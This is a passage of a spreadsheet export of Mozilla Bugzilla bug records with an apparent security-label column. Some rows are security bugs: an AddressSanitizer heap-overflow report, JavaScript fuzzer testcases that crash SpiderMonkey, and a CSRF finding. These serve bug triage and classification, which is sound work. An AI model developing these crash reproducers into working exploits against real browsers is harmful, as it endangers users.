 	gklayout.dll!nsCSSFrameConstructor::ConstructFrame(nsFrameConstructorState &amp; aState={...}, nsIContent * aContent=0x09945ef0, nsIFrame * aParentFrame=0x095fe714, nsFrameItems &amp; aFrameItems={...})  Line 7379 + 0x35 bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ContentInserted(nsIContent * aContainer=0x05ce6050, nsIContent * aChild=0x09945ef0, int aIndexInContainer=0, nsILayoutHistoryState * aFrameState=0x05d58458)  Line 8966	C++
 	gklayout.dll!nsCSSFrameConstructor::RecreateFramesForContent(nsIContent * aContent=0x09945ef0)  Line 11087 + 0x25 bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ProcessRestyledFrames(nsStyleChangeList &amp; aChangeList={...})  Line 9825	C++
 	gklayout.dll!PresShell::RecreateFramesFor(nsIContent * aContent=0x09945ef0)  Line 3374 + 0x12 bytes	C++
 	gklayout.dll!nsXBLBindingRequest::DocumentLoaded(nsIDocument * aBindingDoc=0x09738080)  Line 263	C++
 	gklayout.dll!nsXBLStreamListener::Load(nsIDOMEvent * aEvent=0x0964b250)  Line 478	C++
 	gklayout.dll!DispatchToInterface(nsIDOMEvent * aEvent=0x0964b250, nsIDOMEventListener * aListener=0x097924d4, unsigned int (nsIDOMEvent *)* aMethod=0x045c3de0, const nsID &amp; aIID={...})  Line 184 + 0xb bytes	C++
 	gklayout.dll!nsEventListenerManager::HandleEvent(nsPresContext * aPresContext=0x00000000, nsEvent * aEvent=0x0012f624, nsIDOMEvent * * aDOMEvent=0x0012f59c, nsISupports * aCurrentTarget=0x09738080, unsigned int aFlags=6, nsEventStatus * aEventStatus=0x0012f5a0)  Line 1182 + 0x22 bytes	C++
 	gklayout.dll!nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor &amp; aVisitor={...}, unsigned int aFlags=6)  Line 212	C++
 	gklayout.dll!nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor &amp; aVisitor={...}, unsigned int aFlags=6, nsDispatchingCallback * aCallback=0x00000000)  Line 271	C++
 	gklayout.dll!nsEventDispatcher::Dispatch(nsISupports * aTarget=0x09738080, nsPresContext * aPresContext=0x00000000, nsEvent * aEvent=0x0012f624, nsIDOMEvent * aDOMEvent=0x00000000, nsEventStatus * aEventStatus=0x00000000, nsDispatchingCallback * aCallback=0x00000000)  Line 479 + 0x12 bytes	C++
 	gklayout.dll!nsXMLDocument::EndLoad()  Line 580 + 0x15 bytes	C++
 	gklayout.dll!nsXMLContentSink::DidBuildModel()  Line 381	C++
 	gkparser.dll!nsExpatDriver::DidBuildModel(unsigned int anErrorCode=0, int aNotifySink=1, nsIParser * aParser=0x05dc1758, nsIContentSink * aSink=0x05cc6520)  Line 1311 + 0xe bytes	C++
 	gkparser.dll!nsParser::DidBuildModel(unsigned int anErrorCode=0)  Line 1527 + 0x35 bytes	C++
 	gkparser.dll!nsParser::ResumeParse(int allowIteration=1, int aIsFinalChunk=1, int aCanInterrupt=1)  Line 2283	C++
 	gkparser.dll!nsParser::OnStopRequest(nsIRequest * request=0x097b3ca8, nsISupports * aContext=0x00000000, unsigned int status=0)  Line 2916 + 0x17 bytes	C++
 	gklayout.dll!nsXBLStreamListener::OnStopRequest(nsIRequest * request=0x097b3ca8, nsISupports * aCtxt=0x00000000, unsigned int aStatus=0)  Line 380 + 0x28 bytes	C++
 	necko.dll!nsBaseChannel::OnStopRequest(nsIRequest * request=0x097ddf80, nsISupports * ctxt=0x00000000, unsigned int status=0)  Line 623	C++
 	necko.dll!nsInputStreamPump::OnStateStop()  Line 577	C++
 	necko.dll!nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream * stream=0x0863dbc8)  Line 401 + 0xb bytes	C++
 	xpcom_core.dll!nsInputStreamReadyEvent::Run()  Line 112	C++
 	xpcom_core.dll!nsThread::ProcessNextEvent(int mayWait=1, int * result=0x0012f848)  Line 511	C++
 	xpcom_core.dll!NS_ProcessNextEvent_P(nsIThread * thread=0x012d3fe8, int mayWait=1)  Line 227 + 0x16 bytes	C++
 	gkwidget.dll!nsBaseAppShell::Run()  Line 170 + 0xc bytes	C++
 	tkitcmps.dll!nsAppStartup::Run()  Line 182 + 0x1c bytes	C++
 	xul.dll!XRE_main(int argc=1, char * * argv=0x003fffe0, const nsXREAppData * aAppData=0x012d0880)  Line 3265 + 0x25 bytes	C++
 	firefox.exe!NS_internal_main(int argc=1, char * * argv=0x003fffe0)  Line 156 + 0x12 bytes	C++
 	firefox.exe!wmain(int argc=1, unsigned short * * argv=0x003fa2e8)  Line 87 + 0xd bytes	C++
 	firefox.exe!__tmainCRTStartup()  Line 583 + 0x19 bytes	C
 	firefox.exe!wmainCRTStartup()  Line 403	C
 	kernel32.dll!_BaseProcessStart@4()  + 0x23 bytes</t>
        </is>
      </c>
      <c r="X4398" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4399">
      <c r="A4399" t="n">
        <v>1372430</v>
      </c>
      <c r="B4399" t="inlineStr">
        <is>
          <t>2017-06-12 16:42:29 -0700</t>
        </is>
      </c>
      <c r="C4399" t="inlineStr">
        <is>
          <t>Add stub attribution fields to csv data set</t>
        </is>
      </c>
      <c r="D4399" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E4399" t="n">
        <v>1</v>
      </c>
      <c r="F4399" t="n">
        <v>1</v>
      </c>
      <c r="G4399" t="n">
        <v>2</v>
      </c>
      <c r="H4399" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4399" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J4399" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4399" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4399" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4399" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4399" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4399" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4399" t="inlineStr"/>
      <c r="Q4399" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4399" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4399" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4399" t="n">
        <v>1</v>
      </c>
      <c r="U4399" t="n">
        <v>0</v>
      </c>
      <c r="V4399" t="n">
        <v>2</v>
      </c>
      <c r="W4399" t="inlineStr">
        <is>
          <t>Can you add the stub attribution to the csv files output to s3://net-mozaws-prod-us-west-2-pipeline-analysis/amiyaguchi/churn_csv/
Thanks!</t>
        </is>
      </c>
      <c r="X4399" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4400">
      <c r="A4400" t="n">
        <v>785967</v>
      </c>
      <c r="B4400" t="inlineStr">
        <is>
          <t>2012-08-27 11:22:24 -0700</t>
        </is>
      </c>
      <c r="C4400" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsWaveReader::DecodeAudioData</t>
        </is>
      </c>
      <c r="D4400" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:40 -0700</t>
        </is>
      </c>
      <c r="E4400" t="n">
        <v>1</v>
      </c>
      <c r="F4400" t="n">
        <v>1</v>
      </c>
      <c r="G4400" t="n">
        <v>3</v>
      </c>
      <c r="H4400" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4400" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4400" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4400" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4400" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4400" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4400" t="inlineStr">
        <is>
          <t>[asan][qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4400" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4400" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4400" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T4400" t="n">
        <v>1</v>
      </c>
      <c r="U4400" t="n">
        <v>0</v>
      </c>
      <c r="V4400" t="n">
        <v>10</v>
      </c>
      <c r="W4400" t="inlineStr">
        <is>
          <t>Created attachment 655670
Repro-file
This bug was filed from the Socorro interface and is 
report bp-edaabcc3-a4c5-4935-b00e-940a22120827 .
============================================================= 
I'm trying to minimize the testcase further and I'll add new testcase if I make any progress worth it.
ASAN-report from opt-build:
==10566== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f8860191081 at pc 0x7f8888de9ee1 bp 0x7f88311df4e0 sp 0x7f88311df4d8
READ of size 1 at 0x7f8860191081 thread T18
    #0 0x7f8888de9ee1 in nsWaveReader::DecodeAudioData() /home/attekett/firefox/src/content/media/wave/nsWaveReader.cpp:192
0x7f8860191081 is located 1 bytes to the right of 4096-byte region [0x7f8860190080,0x7f8860191080)
allocated by thread T18 here:
    #0 0x425141 in __interceptor_malloc ??:0
    #1 0x7f888d468228 in moz_xmalloc /home/attekett/firefox/src/memory/mozalloc/mozalloc.cpp:57
Thread T18 created by T17 here:
    #0 0x420e15 in pthread_create ??:0
    #1 0x7f888efac45f in _PR_CreateThread /home/attekett/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:393
    #2 0x7f888efabeb8 in PR_CreateThread /home/attekett/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:476
==10566== ABORTING
Stats: 329M malloced (591M for red zones) by 1746645 calls
Stats: 58M realloced by 20510 calls
Stats: 256M freed by 217843 calls
Stats: 97M really freed by 154806 calls
Stats: 864M (221280 full pages) mmaped in 209 calls
  mmaps   by size class: 8:1589151; 9:32764; 10:16380; 11:16376; 12:3072; 13:1536; 14:1280; 15:256; 16:384; 17:1248; 18:176; 19:40; 20:16; 21:2; 22:12; 23:4; 24:1;
  mallocs by size class: 8:1664564; 9:38223; 10:17175; 11:18265; 12:2582; 13:1803; 14:1539; 15:361; 16:558; 17:1303; 18:195; 19:41; 20:17; 21:2; 22:12; 23:4; 24:1;
  frees   by size class: 8:153178; 9:28974; 10:13767; 11:14943; 12:1700; 13:1601; 14:1361; 15:309; 16:484; 17:1289; 18:169; 19:40; 20:15; 21:2; 22:11;
  rfrees  by size class: 8:114243; 9:17260; 10:9448; 11:10197; 12:972; 13:748; 14:839; 15:190; 16:184; 17:695; 18:25; 19:4; 20:1;
Stats: malloc large: 1575 small slow: 4633
Shadow byte and word:
  0x1ff10c032210: fa
  0x1ff10c032210: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x1ff10c0321f0: 00 00 00 00 00 00 00 00
  0x1ff10c0321f8: 00 00 00 00 00 00 00 00
  0x1ff10c032200: 00 00 00 00 00 00 00 00
  0x1ff10c032208: 00 00 00 00 00 00 00 00
=&gt;0x1ff10c032210: fa fa fa fa fa fa fa fa
  0x1ff10c032218: fa fa fa fa fa fa fa fa
  0x1ff10c032220: fa fa fa fa fa fa fa fa
  0x1ff10c032228: fa fa fa fa fa fa fa fa
  0x1ff10c032230: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X4400" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4401">
      <c r="A4401" t="n">
        <v>621110</v>
      </c>
      <c r="B4401" t="inlineStr">
        <is>
          <t>2010-12-23 00:00:18 -0800</t>
        </is>
      </c>
      <c r="C4401" t="inlineStr">
        <is>
          <t>[SECURITY] Quips (adding/approving/deleting) lacks CSRF protection</t>
        </is>
      </c>
      <c r="D4401" t="inlineStr">
        <is>
          <t>2013-01-28 10:08:04 -0800</t>
        </is>
      </c>
      <c r="E4401" t="n">
        <v>1</v>
      </c>
      <c r="F4401" t="n">
        <v>1</v>
      </c>
      <c r="G4401" t="n">
        <v>4</v>
      </c>
      <c r="H4401" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4401" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4401" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4401" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L4401" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4401" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4401" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4401" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4401" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:moderate]</t>
        </is>
      </c>
      <c r="Q4401" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4401" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S4401" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4401" t="n">
        <v>1</v>
      </c>
      <c r="U4401" t="n">
        <v>0</v>
      </c>
      <c r="V4401" t="n">
        <v>15</v>
      </c>
      <c r="W4401" t="inlineStr">
        <is>
          <t>quips.cgi has no CSRF protection.</t>
        </is>
      </c>
      <c r="X4401" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4402">
      <c r="A4402" t="n">
        <v>1111251</v>
      </c>
      <c r="B4402" t="inlineStr">
        <is>
          <t>2014-12-13 11:08:36 -0800</t>
        </is>
      </c>
      <c r="C4402" t="inlineStr">
        <is>
          <t>Assertion failure: stack_[i].pc() != nullptr, at vm/SPSProfiler.cpp</t>
        </is>
      </c>
      <c r="D4402" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:38 -0700</t>
        </is>
      </c>
      <c r="E4402" t="n">
        <v>1</v>
      </c>
      <c r="F4402" t="n">
        <v>1</v>
      </c>
      <c r="G4402" t="n">
        <v>3</v>
      </c>
      <c r="H4402" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4402" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4402" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4402" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4402" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4402" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4402" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4402" t="inlineStr">
        <is>
          <t>[jsbugmon:testComment=3,origRev=b17e7747d3fb][adv-main38+]</t>
        </is>
      </c>
      <c r="Q4402" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4402" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4402" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T4402" t="n">
        <v>1</v>
      </c>
      <c r="U4402" t="n">
        <v>0</v>
      </c>
      <c r="V4402" t="n">
        <v>17</v>
      </c>
      <c r="W4402" t="inlineStr">
        <is>
          <t>// Randomly chosen test: js/src/jit-test/tests/ion/bug901086.js
enableSPSProfiling();
// Randomly chosen test: js/src/jit-test/tests/basic/bug908915.js
load("bug908915.js");
and bug908915.js is:
for each(let e in newGlobal()) {
    if (e.name == "disableSPSProfiling") {
        e()
    }
}
(function() {
    arguments.__proto__.__proto__ = newGlobal()
    function f(y) {
        y()
    }
    for each(b in (function() {})) {
        if (b.name == "enableSPSProfiling" ||
            b.name == "enableSPSProfilingWithSlowAssertions" ||
            b.name == "setImmutablePrototype") {
            f(b)
        }
    }
})()
asserts js debug shell on m-c changeset 5288b15d22de with --fuzzing-safe --no-threads --ion-eager at Assertion failure: stack_[i].pc() != nullptr, at vm/SPSProfiler.cpp.
Debug configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
This was found by combining random js tests together with jsfunfuzz, the specific file(s) is/are:
http://hg.mozilla.org/mozilla-central/file/5288b15d22de/js/src/jit-test/tests/ion/bug901086.js
http://hg.mozilla.org/mozilla-central/file/5288b15d22de/js/src/jit-test/tests/basic/bug908915.js
This also asserts js shells from FTP at:
https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2014-12-11-mozilla-central-debug/jsshell-mac64.zip
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/95144f555ba4
user:        Jeff Walden
date:        Tue Sep 23 13:03:40 2014 -0700
summary:     Bug 1052139 - Implement the ability to prevent modifying an extensible object's [[Prototype]].  r=efaust, r=bholley
Setting s-s because this seems to involve the SPS profiler.
Waldo/Kannan, any idea what's going on here?</t>
        </is>
      </c>
      <c r="X4402" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4403">
      <c r="A4403" t="n">
        <v>1440334</v>
      </c>
      <c r="B4403" t="inlineStr">
        <is>
          <t>2018-02-22 07:06:22 -0800</t>
        </is>
      </c>
      <c r="C4403" t="inlineStr">
        <is>
          <t>SyncedBookmarksMirror should use a jankYielder</t>
        </is>
      </c>
      <c r="D4403" t="inlineStr">
        <is>
          <t>2018-02-28 02:33:57 -0800</t>
        </is>
      </c>
      <c r="E4403" t="n">
        <v>1</v>
      </c>
      <c r="F4403" t="n">
        <v>1</v>
      </c>
      <c r="G4403" t="n">
        <v>2</v>
      </c>
      <c r="H4403" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4403" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4403" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K4403" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4403" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4403" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4403" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4403" t="inlineStr"/>
      <c r="Q4403" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4403" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4403" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T4403" t="n">
        <v>1</v>
      </c>
      <c r="U4403" t="n">
        <v>0</v>
      </c>
      <c r="V4403" t="n">
        <v>11</v>
      </c>
      <c r="W4403" t="inlineStr">
        <is>
          <t>Split off from bug 1435588.
There are a few cases where it is necessary, store() is an obvious one (after bug 1435588 at least), but we probably want to do it during application, and maybe other times as well.</t>
        </is>
      </c>
      <c r="X4403" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4404">
      <c r="A4404" t="n">
        <v>1330662</v>
      </c>
      <c r="B4404" t="inlineStr">
        <is>
          <t>2017-01-12 07:48:08 -0800</t>
        </is>
      </c>
      <c r="C4404" t="inlineStr">
        <is>
          <t>Assertion failure: end[0] == ZeroLengthArrayData, at js/src/vm/TypedArrayObject.cpp:148</t>
        </is>
      </c>
      <c r="D4404" t="inlineStr">
        <is>
          <t>2017-01-17 18:26:15 -0800</t>
        </is>
      </c>
      <c r="E4404" t="n">
        <v>1</v>
      </c>
      <c r="F4404" t="n">
        <v>1</v>
      </c>
      <c r="G4404" t="n">
        <v>3</v>
      </c>
      <c r="H4404" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4404" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4404" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4404" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4404" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4404" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4404" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4404" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect]</t>
        </is>
      </c>
      <c r="Q4404" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4404" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4404" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T4404" t="n">
        <v>1</v>
      </c>
      <c r="U4404" t="n">
        <v>0</v>
      </c>
      <c r="V4404" t="n">
        <v>11</v>
      </c>
      <c r="W4404" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 97d6f7364394 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off):
for (i=0;i&lt;10000;++i) {
    a = inIon() ? 0 : 300;
    try {
        buf = new Uint8ClampedArray(a);
        assertEq(buf.length, 300);
    } catch ({}) {}
}
Backtrace:
 received signal SIGSEGV, Segmentation fault.
js::TypedArrayObject::assertZeroLengthArrayData (this=0x7ffff0128f40) at js/src/vm/TypedArrayObject.cpp:148
#0  js::TypedArrayObject::assertZeroLengthArrayData (this=0x7ffff0128f40) at js/src/vm/TypedArrayObject.cpp:148
#1  0x0000000000c246aa in js::TypedArrayObject::finalize (fop=&lt;optimized out&gt;, obj=&lt;optimized out&gt;) at js/src/vm/TypedArrayObject.cpp:166
#2  0x00000000009ad0f3 in js::Class::doFinalize (this=&lt;optimized out&gt;, obj=0x7ffff0128f40, fop=0x7fffffffd0b0) at dist/include/js/Class.h:770
#3  JSObject::finalize (this=this@entry=0x7ffff0128f40, fop=fop@entry=0x7fffffffd0b0) at js/src/jsobjinlines.h:87
#4  0x00000000009ad4b2 in js::gc::Arena::finalize&lt;JSObject&gt; (this=this@entry=0x7ffff0128000, fop=fop@entry=0x7fffffffd0b0, thingKind=thingKind@entry=js::gc::AllocKind::OBJECT4_BACKGROUND, thingSize=thingSize@entry=64) at js/src/jsgc.cpp:458
#5  0x0000000000973eed in FinalizeTypedArenas&lt;JSObject&gt; (fop=0x7fffffffd0b0, src=0x7fffffffbfa8, dest=..., thingKind=js::gc::AllocKind::OBJECT4_BACKGROUND, budget=..., keepArenas=js::gc::ArenaLists::KEEP_ARENAS) at js/src/jsgc.cpp:516
#6  0x0000000000975c61 in js::gc::ArenaLists::backgroundFinalize (fop=fop@entry=0x7fffffffd0b0, listHead=0x7ffff0129000, empty=empty@entry=0x7fffffffd068) at js/src/jsgc.cpp:2769
#7  0x000000000097605f in js::gc::GCRuntime::sweepBackgroundThings (this=this@entry=0x7ffff695fad0, zones=..., freeBlocks=...) at js/src/jsgc.cpp:3167
#8  0x0000000000976cef in js::gc::GCRuntime::sweepBackgroundThings (freeBlocks=..., zones=..., this=0x7ffff695fad0) at js/src/jsgc.cpp:3155
#9  js::gc::GCRuntime::endSweepingZoneGroup (this=this@entry=0x7ffff695fad0) at js/src/jsgc.cpp:5175
#10 0x0000000000977445 in js::gc::GCRuntime::sweepPhase (this=this@entry=0x7ffff695fad0, sliceBudget=..., lock=...) at js/src/jsgc.cpp:5388
#11 0x000000000098bd75 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x7ffff695fad0, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME, lock=...) at js/src/jsgc.cpp:5900
#12 0x000000000098d358 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff695fad0, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6176
#13 0x000000000098db99 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff695fad0, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6320
#14 0x000000000098de1b in js::gc::GCRuntime::gc (this=this@entry=0x7ffff695fad0, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6381
#15 0x0000000000b7b3bf in JSRuntime::destroyRuntime (this=this@entry=0x7ffff695f208) at js/src/vm/Runtime.cpp:414
#16 0x0000000000915773 in JSContext::~JSContext (this=0x7ffff695f000, __in_chrg=&lt;optimized out&gt;) at js/src/jscntxt.cpp:937
#17 0x00000000009165aa in js_delete_poison&lt;JSContext&gt; (p=0x7ffff695f000) at dist/include/js/Utility.h:393
#18 js::DestroyContext (cx=0x7ffff695f000) at js/src/jscntxt.cpp:137
#19 0x000000000088df4a in JS_DestroyContext (cx=&lt;optimized out&gt;) at js/src/jsapi.cpp:486
#20 0x0000000000438482 in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:7966
rax	0x2061520	33953056
rbx	0x7ffff0128f40	140737221136192
rcx	0x126f808	19331080
rdx	0x0	0
rsi	0x7ffff6ef7770	140737336276848
rdi	0x7ffff6ef6540	140737336272192
rbp	0x7fffffffbd80	140737488338304
rsp	0x7fffffffbd70	140737488338288
r8	0x7ffff6ef7770	140737336276848
r9	0x7ffff7fe4740	140737354024768
r10	0x58	88
r11	0x7ffff6b9f750	140737332770640
r12	0x7ffff0128f40	140737221136192
r13	0x7fffffffd0b0	140737488343216
r14	0x203f660	33814112
r15	0x7fffffffbe60	140737488338528
rip	0xc1b567 &lt;js::TypedArrayObject::assertZeroLengthArrayData() const+103&gt;
=&gt; 0xc1b567 &lt;js::TypedArrayObject::assertZeroLengthArrayData() const+103&gt;:	movl   $0x0,0x0
   0xc1b572 &lt;js::TypedArrayObject::assertZeroLengthArrayData() const+114&gt;:	ud2    
This bug as everything an s-s bug needs, GC involved, TypedArrays and an assertion that looks like you don't want to meet it at night in a dark corner.</t>
        </is>
      </c>
      <c r="X4404" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4405">
      <c r="A4405" t="n">
        <v>1333754</v>
      </c>
      <c r="B4405" t="inlineStr">
        <is>
          <t>2017-01-25 05:46:41 -0800</t>
        </is>
      </c>
      <c r="C4405" t="inlineStr">
        <is>
          <t>[Regression] Closing and restoring Firefox will always scroll to the first tab</t>
        </is>
      </c>
      <c r="D4405" t="inlineStr">
        <is>
          <t>2017-03-01 02:42:00 -0800</t>
        </is>
      </c>
      <c r="E4405" t="n">
        <v>1</v>
      </c>
      <c r="F4405" t="n">
        <v>1</v>
      </c>
      <c r="G4405" t="n">
        <v>2</v>
      </c>
      <c r="H4405" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4405" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4405" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4405" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4405" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4405" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4405" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q4405" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4405" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4405" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4405" t="n">
        <v>1</v>
      </c>
      <c r="U4405" t="n">
        <v>0</v>
      </c>
      <c r="V4405" t="n">
        <v>3</v>
      </c>
      <c r="W4405" t="inlineStr">
        <is>
          <t>Build: 51abcc7ca
Device: iPad Pro
iOS: 9.2.1
Steps to reproduce:
1. Launch Fennec
2. Open 12 new tabs by tapping the '+' symbol
3. Select the last tab
4. Double tap on the home button and close Fennec
5. Open Fennec
Actual results:
- The last tab which is selected is not in view. The scroll is positioned at the first tab.
Expected results:
- The selected tab should be in view.</t>
        </is>
      </c>
      <c r="X4405" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4406">
      <c r="A4406" t="n">
        <v>1080995</v>
      </c>
      <c r="B4406" t="inlineStr">
        <is>
          <t>2014-10-09 22:54:18 -0700</t>
        </is>
      </c>
      <c r="C4406" t="inlineStr">
        <is>
